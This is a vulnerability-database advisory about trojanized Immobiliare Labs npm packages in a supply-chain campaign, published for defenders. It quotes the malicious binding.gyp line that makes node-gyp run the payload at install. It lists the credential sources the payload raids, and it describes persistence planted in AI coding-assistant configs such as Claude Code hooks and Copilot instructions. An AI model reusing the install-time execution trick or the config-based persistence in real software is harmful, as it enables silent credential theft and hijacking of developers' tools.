VDB

GCVE-110-OSM-2026-6699

GCVE-110-OSM-2026-6699
Advisory PublishedCVSS 9.6/10
Vulnetix · Advisory published June 26, 2026
Multiple versions of @immobiliarelabs/backstage-plugin-ldap-auth-backend were trojanized as part of the Miasma campaign, published within a 30-second window on 2026-06-26. The attack affected all four npm packages maintained by Immobiliare Labs simultaneously — @immobiliarelabs/backstage-plugin-gitlab, @immobiliarelabs/backstage-plugin-gitlab-backend, @immobiliarelabs/backstage-plugin-ldap-auth, @immobiliarelabs/backstage-plugin-ldap-auth-backend — with malicious patch versions inserted into every supported major release series across all four packages at once, indicating an account-level compromise of the Immobiliare Labs npm publisher rather than a single package takeover. The attack follows the same pattern as the mass supply chain attack on leo-platform packages previously documented by StepSecurity: simultaneous publication of malicious patch versions across all supported release series. Each compromised version contains a 5 MB index.js absent from all prior releases and a new binding.gyp that causes node-gyp to execute the payload during installation — a technique not caught by tools that only monitor scripts.postinstall in package.json. The payload steals credentials from a broad range of sources and attempts to persist inside AI coding assistant configurations. Reported to Immobiliare Labs via GitHub issue #1052 on 2026-06-26. **Execution vector** `binding.gyp` shell expansion via node-gyp — `"sources": ["<!(node index.js > /dev/null 2>&1 && echo stub.c)"]` — bypasses postinstall script detection. **Obfuscation (3 layers)** - ROT-2 Caesar cipher wrapping the full payload in a `try { eval(...) }` block - AES-128-GCM decryption of two embedded ciphertext blobs using hardcoded keys: first blob (`_b`) decrypts to a Bun runtime downloader, second blob (`_p`) decrypts to the main credential-harvesting payload - obfuscator.io string table rotation on the main payload with a secondary encryption layer on the most sensitive strings **Second-stage runtime** Downloads Bun v1.3.13 from `hxxps://github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-<os>-<arch>.zip`, writes the decrypted payload to a randomly named temporary file, executes it using Bun, then deletes the file. Bun is used specifically to evade Node.js `--require` hook-based security monitoring. **Credential targets** - GitHub tokens (PATs, GitHub App JWTs, OIDC tokens, runner tokens) - GitHub Actions masked secrets via `/proc/<pid>/mem` read of the Runner.Worker process - AWS credentials (env vars, IMDS at 169[.]254[.]169[.]254, ECS task metadata at 169[.]254[.]170[.]2, SSM Parameter Store, Secrets Manager) - Google Cloud Platform service account credentials - Azure managed identity, service principal, and Key Vault credentials - Kubernetes service account tokens and namespace secrets - HashiCorp Vault tokens (file paths `/home/runner/.vault-token`, `/root/.vault-token`, `/run/secrets/VAULT_TOKEN`) - npm, PyPI, RubyGems, and JFrog Artifactory tokens - Password manager databases (Bitwarden, 1Password, gopass) - SSH keys (`.ssh/`) **Persistence — infectHost function** Modifies AI coding assistant configs to establish persistence: - Claude Code: `.claude/settings.json` (SessionStart hook) - GitHub Copilot: `.github/copilot-instructions.md` - Cursor: `.cursor/rules/setup.mdc` - VS Code: `.vscode/tasks.json` (folderOpen trigger) - Aider: `.aider.conf.yml` - Also targets: Amazon Kiro, Sourcegraph Cody, Google Gemini, OpenAI Codex **Worm propagation** Functions by name: `squatPackage`, `updateTarball`, `handleNpmTokens`, `handlePypiTokens` — suggest ability to publish modified packages to npm and PyPI using stolen registry credentials. **Network indicators** - `hxxps://github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-<os>-<arch>.zip` **File indicators** - `index.js` (5 MB) in package root — present in compromised versions only; absent from all prior releases - `binding.gyp` in package root — present in compromised versions only; triggers payload via node-gyp - Tarball SHA512 (gitlab@2.1.2): `sha512-k7pGY+wScfqX51fpF412dOze6kSIytHYwZAXPhu6pDV+R7JWnD98Uc0nzGVHFead99nwWU4x56fkre/jH3Q7Xg==`

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknown@immobiliarelabs/backstage-plugin-ldap-auth-backend

Browse GCVE Records

73,393 records in the GCVE database · Updated July 17, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›